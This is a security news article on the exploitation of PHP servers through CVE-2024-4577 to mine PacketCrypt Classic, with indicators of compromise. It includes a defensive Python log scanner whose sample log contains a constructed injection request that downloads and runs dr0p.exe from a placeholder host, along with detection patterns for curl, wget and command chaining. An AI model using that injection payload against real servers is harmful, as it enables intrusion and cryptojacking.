PHP Servers Vulnerability Exploited to Mine PacketCrypt Cryptocurrency

The observed URL carries a command injection payload in a GET parameter named "arg". The injected command attempts to download a malicious executable named "dr0p.exe" from a remote server, using curl first and wget as a fallback.

If curl is unable to complete the download, the command falls back to wget; the downloaded file is then executed locally, which is likely to compromise the system.

The analysis revealed that dr0p.exe operates as a downloader, which dynamically fetches a secondary payload named pkt1.exe from a remote server with the IP address 23.27.51.244. 

This server, located in the US, exposes four open ports (22, 80, 110, and 6664) and is identified as running the EvilBit Block Explorer on port 80, suggesting that the server may be involved in cryptocurrency mining or other malicious activities, potentially leveraging the downloaded pkt1.exe for further exploitation.

Querying 23.27.51.244 on Shodan

The executable pkt1.exe initiates a child process, packetcrypt.exe, and during this process, pkt1.exe transmits a PacketCrypt (PKT Classic) wallet address (pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a) as an argument to packetcrypt.exe. 

Examination of the PKTC blockchain explorer indicates that the associated wallet has successfully mined 5 PKTC, translating to approximately 0.0021785 USDT at current market values. This suggests that the pkt1.exe executable is involved in cryptocurrency mining activity specifically targeting the PacketCrypt (PKT Classic) network.

Recent web URL activity suggests exploitation of vulnerable or misconfigured PHP servers, likely leveraging CVE-2024-4577, which allows unfettered public access to php-cgi.exe and potentially enables attackers to execute arbitrary code.

This activity highlights the critical need for regular security audits and patching of PHP servers to address vulnerabilities like CVE-2024-4577 and to mitigate risks such as crypto mining, which can significantly degrade server performance.
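The request pattern described above (a GET parameter named "arg" that invokes curl or wget to fetch an executable, with the downloaded file then run locally) and the audit recommendation in the preceding paragraph can both be turned into a simple access-log check. The following Python script is an added example written for this article, not code from the original report or from SANS: it parses Common Log Format lines, flags any request that reaches php-cgi.exe directly, and inspects the "arg" query parameter for download tools, Windows executables, and shell command chaining. The log lines, client addresses, and the host "attacker.invalid" are constructed for the example; the first-stage download host is not named in the article.

```python
"""Flag web-server access-log entries that match the php-cgi.exe / "arg" abuse
pattern described in the article. Added example; sample data is constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Common Log Format lines. 203.0.113.0/24 is documentation address
# space and attacker.invalid is a placeholder, not a real host.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jan/2025:10:12:01 +0000] "GET /index.php HTTP/1.1" 200 512
203.0.113.9 - - [05/Jan/2025:10:12:05 +0000] "GET /php-cgi/php-cgi.exe?arg=curl+http://attacker.invalid/dr0p.exe+-o+dr0p.exe+%7C%7C+wget+http://attacker.invalid/dr0p.exe%3B+dr0p.exe HTTP/1.1" 200 0
203.0.113.9 - - [05/Jan/2025:10:12:09 +0000] "GET /search.php?arg=shoes HTTP/1.1" 200 2048
203.0.113.11 - - [05/Jan/2025:10:13:00 +0000] "POST /php-cgi/php-cgi.exe HTTP/1.1" 404 0
"""

# Request line inside the quoted section of a CLF entry.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Download tools named in the article, and shell operators used to chain the
# download with execution of the fetched file.
DOWNLOADERS = ("curl", "wget")
CHAIN_OPS = ("||", "&&", ";", "|")


def analyze_line(line):
    """Return a finding dict for a suspicious log line, or None if benign."""
    match = REQ_RE.search(line)
    if not match:
        return None  # malformed or non-CLF line; ignore
    target = match.group("target")
    parts = urlsplit(target)
    findings = []

    # Any request that lands on php-cgi.exe over HTTP is worth reviewing:
    # the article ties the activity to unfettered public access to that binary.
    if parts.path.lower().endswith("php-cgi.exe"):
        findings.append("request reaches php-cgi.exe directly")

    # parse_qs already percent-decodes values and turns '+' into spaces.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("arg", []):
        decoded = value.lower()
        if any(tool in decoded for tool in DOWNLOADERS):
            findings.append("arg parameter invokes a download tool (curl/wget)")
        if ".exe" in decoded:
            findings.append("arg parameter references a Windows executable")
        if any(op in decoded for op in CHAIN_OPS):
            findings.append("arg parameter chains shell commands")

    if not findings:
        return None
    return {
        "client": line.split()[0],
        "method": match.group("method"),
        "target": target,
        "findings": findings,
    }


def scan_log(text):
    """Run analyze_line over every line of a log and collect the hits."""
    return [hit for hit in (analyze_line(l) for l in text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['client']} {hit['method']} {hit['target']}")
        for finding in hit["findings"]:
            print(f"    - {finding}")
```

Run against a real access log by reading the file into `scan_log`. A benign "arg" value (the search request in the sample) produces no finding, while the constructed exploit-style request is flagged on three counts and the bare POST to php-cgi.exe on one; the second kind of hit is the signal that php-cgi.exe is reachable from the outside at all, which is the exposure the article recommends auditing and patching.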

According to SANS, system owners should give these security measures the highest priority when it comes to protecting their systems from exploitation.

The PacketCrypt project initially utilized a Proof-of-Work (PoW) consensus mechanism known as PKT Classic (PKTC), which allowed users to mine cryptocurrency by performing computational tasks. 

The project later transitioned to a Stake-to-Earn (S2E) model, now referred to simply as PacketCrypt (PKT), which changed the cryptocurrency associated with the project.

Consequently, the cryptocurrency mined on vulnerable PHP servers during the investigation pertains specifically to PKTC, the cryptocurrency of the original PoW-based PacketCrypt system.

Kaaviya (https://cyberpress.org/)
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She covers various cybersecurity incidents happening in cyberspace.
